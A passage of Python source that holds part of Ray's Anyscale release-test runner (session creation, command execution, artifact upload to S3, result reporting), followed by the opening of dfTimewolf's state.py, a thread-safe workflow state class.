_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
compute_tpl_id = None
compute_tpl_name = None
if compute_tpl:
# As of Anyscale 0.4.1, it is an error to use the same compute template
# name within the same organization, between different projects.
compute_tpl_name = f"{project_id}/compute/{_dict_hash(compute_tpl)}"
logger.info(f"Tests uses compute template "
f"with name {compute_tpl_name}. Looking up existing "
f"templates.")
paging_token = None
while not compute_tpl_id:
result = sdk.search_compute_templates(
dict(
project_id=project_id,
name=dict(equals=compute_tpl_name),
include_anonymous=True),
paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == compute_tpl_name:
compute_tpl_id = res.id
logger.info(
f"Template already exists with ID {compute_tpl_id}")
break
if not paging_token:
break
if not compute_tpl_id:
logger.info(f"Compute template not found. "
f"Creating with name {compute_tpl_name}.")
try:
result = sdk.create_compute_template(
dict(
name=compute_tpl_name,
project_id=project_id,
config=compute_tpl))
compute_tpl_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create compute "
f"template: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_compute_template(
sdk=sdk,
project_id=project_id,
compute_tpl=compute_tpl,
_repeat=False)
raise e
logger.info(f"Compute template created with ID {compute_tpl_id}")
return compute_tpl_id, compute_tpl_name
def create_or_find_app_config(
sdk: AnyscaleSDK,
project_id: str,
app_config: Dict[Any, Any],
_repeat: bool = True) -> Tuple[Optional[str], Optional[str]]:
app_config_id = None
app_config_name = None
if app_config:
app_config_name = f"{project_id}-{_dict_hash(app_config)}"
logger.info(f"Test uses an app config with hash {app_config_name}. "
f"Looking up existing app configs with this name.")
paging_token = None
while not app_config_id:
result = sdk.list_app_configs(
project_id=project_id, count=50, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for res in result.results:
if res.name == app_config_name:
app_config_id = res.id
logger.info(
f"App config already exists with ID {app_config_id}")
break
if not paging_token or app_config_id:
break
if not app_config_id:
logger.info("App config not found. Creating new one.")
try:
result = sdk.create_app_config(
dict(
name=app_config_name,
project_id=project_id,
config_json=app_config))
app_config_id = result.result.id
except Exception as e:
if _repeat:
logger.warning(
f"Got exception when trying to create app "
f"config: {e}. Sleeping for 10 seconds and then "
f"try again once...")
time.sleep(10)
return create_or_find_app_config(
sdk=sdk,
project_id=project_id,
app_config=app_config,
_repeat=False)
raise e
logger.info(f"App config created with ID {app_config_id}")
return app_config_id, app_config_name
def install_app_config_packages(app_config: Dict[Any, Any]):
os.environ.update(app_config.get("env_vars", {}))
packages = app_config["python"]["pip_packages"]
for package in packages:
subprocess.check_output(["pip", "install", "-U", package], text=True)
def install_matching_ray():
wheel = os.environ.get("RAY_WHEELS", None)
if not wheel:
return
assert "manylinux2014_x86_64" in wheel, wheel
if sys.platform == "darwin":
platform = "macosx_10_13_intel"
elif sys.platform == "win32":
platform = "win_amd64"
else:
platform = "manylinux2014_x86_64"
wheel = wheel.replace("manylinux2014_x86_64", platform)
subprocess.check_output(["pip", "uninstall", "-y", "ray"], text=True)
subprocess.check_output(["pip", "install", "-U", wheel], text=True)
def wait_for_build_or_raise(sdk: AnyscaleSDK,
app_config_id: Optional[str]) -> Optional[str]:
if not app_config_id:
return None
# Fetch build
build_id = None
last_status = None
result = sdk.list_builds(app_config_id)
for build in sorted(result.results, key=lambda b: b.created_at):
build_id = build.id
last_status = build.status
if build.status == "failed":
continue
if build.status == "succeeded":
logger.info(f"Link to app config build: "
f"{anyscale_app_config_build_url(build_id)}")
return build_id
if last_status == "failed":
raise RuntimeError("App config build failed.")
if not build_id:
raise RuntimeError("No build found for app config.")
# Build found but not failed/finished yet
completed = False
start_wait = time.time()
next_report = start_wait + REPORT_S
logger.info(f"Waiting for build {build_id} to finish...")
logger.info(f"Track progress here: "
f"{anyscale_app_config_build_url(build_id)}")
while not completed:
now = time.time()
if now > next_report:
logger.info(f"... still waiting for build {build_id} to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_build(build_id)
build = result.result
if build.status == "failed":
raise RuntimeError(
f"App config build failed. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
if build.status == "succeeded":
logger.info("Build succeeded.")
return build_id
completed = build.status not in ["in_progress", "pending"]
if completed:
raise RuntimeError(
f"Unknown build status: {build.status}. Please see "
f"{anyscale_app_config_build_url(build_id)} for details")
time.sleep(1)
return build_id
def run_job(cluster_name: str, compute_tpl_name: str, cluster_env_name: str,
job_name: str, min_workers: str, script: str,
script_args: List[str],
env_vars: Dict[str, str]) -> Tuple[int, str]:
# Start cluster and job
address = f"anyscale://{cluster_name}?cluster_compute={compute_tpl_name}" \
f"&cluster_env={cluster_env_name}&autosuspend=5&&update=True"
logger.info(f"Starting job {job_name} with Ray address: {address}")
env = copy.deepcopy(os.environ)
env.update(GLOBAL_CONFIG)
env.update(env_vars)
env["RAY_ADDRESS"] = address
env["RAY_JOB_NAME"] = job_name
env["RAY_RELEASE_MIN_WORKERS"] = str(min_workers)
proc = subprocess.Popen(
script.split(" ") + script_args,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
text=True)
proc.stdout.reconfigure(line_buffering=True)
logs = ""
for line in proc.stdout:
logs += line
sys.stdout.write(line)
proc.wait()
return proc.returncode, logs
def create_and_wait_for_session(
sdk: AnyscaleSDK,
stop_event: multiprocessing.Event,
session_name: str,
session_options: Dict[Any, Any],
) -> str:
# Create session
logger.info(f"Creating session {session_name}")
result = sdk.create_session(session_options)
session_id = result.result.id
# Trigger session start
logger.info(f"Starting session {session_name} ({session_id})")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result = sdk.start_session(session_id, start_session_options={})
sop_id = result.result.id
completed = result.result.completed
# Wait for session
logger.info(f"Waiting for session {session_name}...")
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event)
now = time.time()
if now > next_report:
logger.info(f"... still waiting for session {session_name} "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
session_operation_response = sdk.get_session_operation(
sop_id, _request_timeout=30)
session_operation = session_operation_response.result
completed = session_operation.completed
time.sleep(1)
return session_id
def run_session_command(sdk: AnyscaleSDK,
session_id: str,
cmd_to_run: str,
stop_event: multiprocessing.Event,
result_queue: multiprocessing.Queue,
env_vars: Dict[str, str],
state_str: str = "CMD_RUN",
kick_off_only: bool = False) -> Tuple[str, int]:
full_cmd = " ".join(f"{k}={v}"
for k, v in env_vars.items()) + " " + cmd_to_run
logger.info(f"Running command in session {session_id}: \n" f"{full_cmd}")
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"], session_id=session_id)
logger.info(f"Link to session: {session_url}")
result_queue.put(State(state_str, time.time(), None))
result = sdk.create_session_command(
dict(session_id=session_id, shell_command=full_cmd))
scd_id = result.result.id
completed = result.result.finished_at is not None
if kick_off_only:
return scd_id, 0
start_wait = time.time()
next_report = start_wait + REPORT_S
while not completed:
_check_stop(stop_event)
now = time.time()
if now > next_report:
logger.info(f"... still waiting for command to finish "
f"({int(now - start_wait)} seconds) ...")
next_report = next_report + REPORT_S
result = sdk.get_session_command(session_command_id=scd_id)
completed = result.result.finished_at
time.sleep(1)
status_code = result.result.status_code
if status_code != 0:
raise RuntimeError(
f"Command returned non-success status: {status_code}")
return scd_id, status_code
def get_command_logs(session_controller: SessionController,
scd_id: str,
lines: int = 50):
result = session_controller.api_client.get_execution_logs_api_v2_session_commands_session_command_id_execution_logs_get( # noqa: E501
session_command_id=scd_id,
start_line=-1 * lines,
end_line=0)
return result.result.lines
def get_remote_json_content(
temp_dir: str,
session_name: str,
remote_file: Optional[str],
session_controller: SessionController,
):
if not remote_file:
logger.warning("No remote file specified, returning empty dict")
return {}
local_target_file = os.path.join(temp_dir, ".tmp.json")
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
with open(local_target_file, "rt") as f:
return json.load(f)
def get_local_json_content(local_file: Optional[str], ):
if not local_file:
logger.warning("No local file specified, returning empty dict")
return {}
with open(local_file, "rt") as f:
return json.load(f)
def pull_artifacts_and_store_in_cloud(
temp_dir: str,
logs: str,
session_name: str,
test_name: str,
artifacts: Optional[Dict[Any, Any]],
session_controller: SessionController,
):
output_log_file = os.path.join(temp_dir, "output.log")
with open(output_log_file, "wt") as f:
f.write(logs)
bucket = GLOBAL_CONFIG["RELEASE_AWS_BUCKET"]
location = f"{GLOBAL_CONFIG['RELEASE_AWS_LOCATION']}" \
f"/{session_name}/{test_name}"
saved_artifacts = {}
s3_client = boto3.client("s3")
s3_client.upload_file(output_log_file, bucket, f"{location}/output.log")
saved_artifacts["output.log"] = f"s3://{bucket}/{location}/output.log"
# Download artifacts
if artifacts:
for name, remote_file in artifacts.items():
logger.info(f"Downloading artifact `{name}` from "
f"{remote_file}")
local_target_file = os.path.join(temp_dir, name)
session_controller.pull(
session_name=session_name,
source=remote_file,
target=local_target_file)
# Upload artifacts to s3
s3_client.upload_file(local_target_file, bucket,
f"{location}/{name}")
saved_artifacts[name] = f"s3://{bucket}/{location}/{name}"
return saved_artifacts
def find_session_by_test_name(
sdk: AnyscaleSDK,
session_controller: SessionController,
temp_dir: str,
state_json: str,
project_id: str,
test_name: str,
) -> Optional[Tuple[str, str, Dict[Any, Any]]]:
paging_token = None
while True: # Will break if paging_token is None after first search
result = sdk.search_sessions(
project_id=project_id,
sessions_query=dict(
name=dict(contains=test_name),
state_filter=["Running"],
paging=dict(count=20, paging_token=paging_token)))
for session in result.results:
logger.info(f"Found sessions {session.name}")
if not session.name.startswith(test_name):
continue
try:
session_state = get_remote_json_content(
temp_dir=temp_dir,
session_name=session.name,
remote_file=state_json,
session_controller=session_controller)
except Exception as exc:
raise RuntimeError(f"Could not get remote json content "
f"for session {session.name}") from exc
if session_state.get("test_name") == test_name:
return session.id, session.name, session_state
session_token = result.metadata.next_paging_token
if not session_token:
return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
) -> Tuple[Optional[str], Optional[bool]]:
scd_id = None
paging_token = None
success = None
while not scd_id:
result = sdk.list_session_commands(
session_id=session_id, paging_token=paging_token)
paging_token = result.metadata.next_paging_token
for cmd in result.results:
if not scd_id:
scd_id = cmd.id
completed = cmd.finished_at is not None
if completed:
if success is None:
success = True
success = success and cmd.status_code == 0
if not completed:
return cmd.id, None
return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
install_app_config_packages(app_config)
install_matching_ray()
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"]: returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_name = None
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
session_options["cloud_id"] = (
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"], )
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
app_config_id, app_config_name = create_or_find_app_config(
sdk, project_id, app_config)
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars)
_process_finished_client_command(returncode, logs)
return
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
_check_stop(stop_event)
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
stop_event=stop_event,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, status_code = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
stop_event=stop_event,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN",
kick_off_only=kick_off_only)
if not kick_off_only:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
result_queue.put(
State("END", time.time(), {
"status": "timeout",
"last_logs": logs
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
test_name: str,
project_id: str,
category: str = "unspecified",
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress=False,
report=True):
with open(test_config_file, "rt") as f:
test_configs = yaml.load(f, Loader=yaml.FullLoader)
test_config_dict = {}
for test_config in test_configs:
name = test_config.pop("name")
test_config_dict[name] = test_config
if test_name not in test_config_dict:
raise ValueError(
f"Test with name `{test_name}` not found in test config file "
f"at `{test_config_file}`.")
test_config = test_config_dict[test_name]
if smoke_test and "smoke_test" in test_config:
smoke_test_config = test_config.pop("smoke_test")
test_config = _deep_update(test_config, smoke_test_config)
local_dir = os.path.dirname(test_config_file)
if "local_dir" in test_config:
# local_dir is relative to test_config_file
local_dir = os.path.join(local_dir, test_config["local_dir"])
if test_config["run"].get("use_connect"):
assert not kick_off_only, \
"--kick-off-only is unsupported when running with " \
"Anyscale connect."
assert not check_progress, \
"--check is unsupported when running with Anyscale connect."
if test_config.get("artifacts", {}):
logger.error(
"Saving artifacts are not yet supported when running with "
"Anyscale connect.")
result = run_test_config(
local_dir,
project_id,
test_name,
test_config,
smoke_test=smoke_test,
no_terminate=no_terminate,
kick_off_only=kick_off_only,
check_progress=check_progress,
upload_artifacts=report)
status = result.get("status", "invalid")
if kick_off_only:
if status != "kickoff":
raise RuntimeError("Error kicking off test.")
logger.info("Kicked off test. It's now up to the `--check` "
"part of the script to track its process.")
return
else:
# `--check` or no kick off only
if status == "nosession":
logger.info(f"No running session found for test {test_name}, so "
f"assuming everything is fine.")
return
if status == "kickoff":
logger.info(f"Test {test_name} is still running.")
return
last_logs = result.get("last_logs", "No logs.")
test_suite = os.path.basename(test_config_file).replace(".yaml", "")
report_kwargs = dict(
test_suite=test_suite,
test_name=test_name,
status=status,
logs=last_logs,
results=result.get("results", {}),
artifacts=result.get("artifacts", {}),
category=category,
)
if report:
report_result(**report_kwargs)
else:
logger.info(f"Usually I would now report the following results:\n"
f"{report_kwargs}")
if has_errored(result):
raise RuntimeError(last_logs)
return
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
if args.ray_wheels:
os.environ["RAY_WHEELS"] = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
category=args.category,
smoke_test=args.smoke_test,
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
)
|
state.py
|
# -*- coding: utf-8 -*-
"""This class maintains the internal dfTimewolf state.
Use it to track errors, abort on global failures, clean up after modules, etc.
"""
import logging
import sys
import threading
import traceback
from dftimewolf.lib import errors
from dftimewolf.lib import utils
from dftimewolf.lib.modules import manager as modules_manager
# TODO(tomchop): Consider changing this to `dftimewolf.state` if we ever need
# more granularity.
logger = logging.getLogger('dftimewolf')
NEW_ISSUE_URL = 'https://github.com/log2timeline/dftimewolf/issues/new'
class DFTimewolfState(object):
"""The main State class.
Attributes:
command_line_options (dict[str, str]): Command line options passed to
dftimewolf.
config (dftimewolf.config.Config): Class to be used throughout execution.
errors (list[tuple[str, bool]]): errors generated by a module. These
should be cleaned up after each module run using the CleanUp() method.
global_errors (list[tuple[str, bool]]): the CleanUp() method moves non
critical errors to this attribute for later reporting.
input (list[str]): data that the current module will use as input.
output (list[str]): data that the current module generates.
recipe: (dict[str, str]): recipe declaring modules to load.
store (dict[str, object]): arbitrary data for modules.
"""
def __init__(self, config):
"""Initializes a state."""
super(DFTimewolfState, self).__init__()
self.command_line_options = {}
self._cache = {}
self._module_pool = {}
self._state_lock = threading.Lock()
self._threading_event_per_module = {}
self.config = config
self.errors = []
self.global_errors = []
self.input = []
self.output = []
self.recipe = None
self.store = {}
self.streaming_callbacks = {}
self._abort_execution = False
def _InvokeModulesInThreads(self, callback):
"""Invokes the callback function on all the modules in separate threads.
Args:
callback (function): callback function to invoke on all the modules.
"""
threads = []
for module_definition in self.recipe['modules']:
thread_args = (module_definition, )
thread = threading.Thread(target=callback, args=thread_args)
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
self.CheckErrors(is_global=True)
def LoadRecipe(self, recipe):
"""Populates the internal module pool with modules declared in a recipe.
Args:
recipe (dict[str, str]): recipe declaring modules to load.
Raises:
RecipeParseError: if a module in the recipe does not exist.
"""
self.recipe = recipe
module_definitions = recipe.get('modules', [])
preflight_definitions = recipe.get('preflights', [])
for module_definition in module_definitions + preflight_definitions:
# Combine CLI args with args from the recipe description
module_name = module_definition['name']
module_class = modules_manager.ModulesManager.GetModuleByName(module_name)
if not module_class:
raise errors.RecipeParseError(
'Recipe uses unknown module: {0:s}'.format(module_name))
runtime_name = module_definition.get('runtime_name')
if not runtime_name:
runtime_name = module_name
self._module_pool[runtime_name] = module_class(self, name=runtime_name)
def AddToCache(self, name, value):
"""Thread-safe method to add data to the state's cache.
If the cached item is already in the cache it will be
overwritten with the new value.
Args:
name (str): string with the name of the cache variable.
value (object): the value that will be stored in the cache.
"""
with self._state_lock:
self._cache[name] = value
def GetFromCache(self, name, default_value=None):
"""Thread-safe method to get data from the state's cache.
Args:
name (str): string with the name of the cache variable.
default_value (object): the value that will be returned if
the item does not exist in the cache. Optional argument
and defaults to None.
Returns:
object: object from the cache that corresponds to the name, or
the value of "default_value" if the cach does not contain
the variable.
"""
with self._state_lock:
return self._cache.get(name, default_value)
def StoreContainer(self, container):
"""Thread-safe method to store data in the state's store.
Args:
container (AttributeContainer): data to store.
"""
with self._state_lock:
self.store.setdefault(container.CONTAINER_TYPE, []).append(container)
def GetContainers(self, container_class, pop=False):
"""Thread-safe method to retrieve data from the state's store.
Args:
container_class (type): AttributeContainer class used to filter data.
pop (Optional[bool]): Whether to remove the containers from the state when
they are retrieved.
Returns:
list[AttributeContainer]: attribute container objects provided in
the store that correspond to the container type.
"""
